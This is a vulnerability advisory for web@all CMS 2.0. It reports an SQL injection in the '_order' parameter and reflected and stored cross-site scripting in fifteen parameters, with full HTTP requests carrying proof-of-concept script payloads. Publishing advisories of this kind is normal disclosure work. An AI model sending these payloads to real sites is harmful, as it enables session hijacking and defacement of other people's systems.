web@all CMS 2.0 - Multiple Vulnerabilities



web@all CMS 2.0 (_order) SQL Injection Vulnerability



Vendor: web@all
Product web page: http://www.webatall.org
Affected version: 2.0

Summary: web@all is a PHP content management system (CMS). If you
know about it,you nearly can use it to do anything.

Desc: The application suffers from an SQL Injection vulnerability.
Input passed via the GET parameter '_order' is not properly sanitised
before being returned to the user or used in SQL queries. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5099
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5099.php


21.08.2012

---


http://localhost/webatall/sys/index.php?_key=author&_order=1[SQL ATTACK QUERY]&_text[status]=-1&_type[]=0&mod=article

=============================================================================

web@all CMS 2.0 Multiple Remote XSS Vulnerabilities


Vendor: web@all
Product web page: http://www.webatall.org
Affected version: 2.0

Summary: web@all is a PHP content management system (CMS). If you
know about it,you nearly can use it to do anything.

Desc: web@all CMS suffers from multiple stored and reflected cross-site
scripting vulnerabilities. The issues are triggered when input passed via
several parameters to several scripts is not properly sanitized before being
returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.

----------------------------------------------------------------------------
  * Parameter *          * Method *          * Module *          * Type *
----------------------------------------------------------------------------

 1. act                    POST                member            Reflected
 2. security               POST                member            Reflected
 3. username               POST                member            Reflected
 4. id                     GET                 article           Reflected
 5. mod                    GET/POST            member            Reflected
 6. _flag                  GET                 article           Reflected
 7. _text[]                GET                 article           Reflected
 8. _text[alias]           GET                 article           Reflected
 9. _text[category]        GET                 article           Reflected
10. _text[email]           GET                 member            Reflected
11. _text[title]           GET                 article           Reflected
12. _text[username]        GET                 article           Reflected
13. _text[timeadd]         GET                 member            Reflected
14. title                  POST                article/cron      Stored
15. description            POST                cron              Stored

----------------------------------------------------------------------------

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5098
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5098.php


21.08.2012

---


Reflected:
----------


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28900164%29%29%3e&goto=%2fsys&mod=member&password=Password&security=1&submit=Sign%20in&username=Username


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28920000%29%29%3e&password=Password&security=1&submit=Sign%20in&username=Username


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 159
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=member&password=Password&security=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28964492%29%29%3e&submit=Sign%20in&username=Username


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 147
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=member&password=admin&security=1&submit=Sign+in&username=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28913398%29%29%3e


GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=%22%20onmouseover%3dprompt%28940245%29%20bad%3d%22&mod=article
GET /webatall/sys/index.php?_text[timeadd]=1345564800&_type[timeadd]=2&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28961358%29%29%3e
GET /webatall/sys/index.php?_flag=%22%20onmouseover%3dprompt%28916116%29%20bad%3d%22&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=%22%20onmouseover%3dprompt%28965775%29%20bad%3d%22&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article
GET /webatall/sys/index.php?_text%5balias%5d=%22%20onmouseover%3dprompt%28989568%29%20bad%3d%22&_type%5balias%5d=0&mod=article
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article
GET /webatall/sys/index.php?_text%5bemail%5d=%22%20onmouseover%3dprompt%28999602%29%20bad%3d%22&_type%5bemail%5d=0&mod=member
GET /webatall/sys/index.php?_text%5btitle%5d=%22%20onmouseover%3dprompt%28927731%29%20bad%3d%22&_type%5btitle%5d=0&mod=article
GET /webatall/sys/index.php?_text%5busername%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_type%5busername%5d=0&mod=member
GET /webatall/sys/index.php?_text[timeadd]=%22%20onmouseover%3dprompt%28929079%29%20bad%3d%22&_type[timeadd]=2&mod=member



Stored:
-------


POST http://localhost/webatall/sys/action.php HTTP/1.1

act    sys_add
author    test
category_id    1
content    test
content_key    test
copyright    test
files    
id    
lang    
menu    
meta_description    test
meta_keywords    test
mod    article
options    test
status    1
thumbs    test
title    "><script>alert(1);</script>



POST http://localhost/webatall/sys/action.php HTTP/1.1

act    sys_add
cron    delete_unpaid_transaction.php
description    "><script>alert(2);</script>
id    
menu    
mod    cron
run_interval    
status    1
title    "><script>alert(3);</script>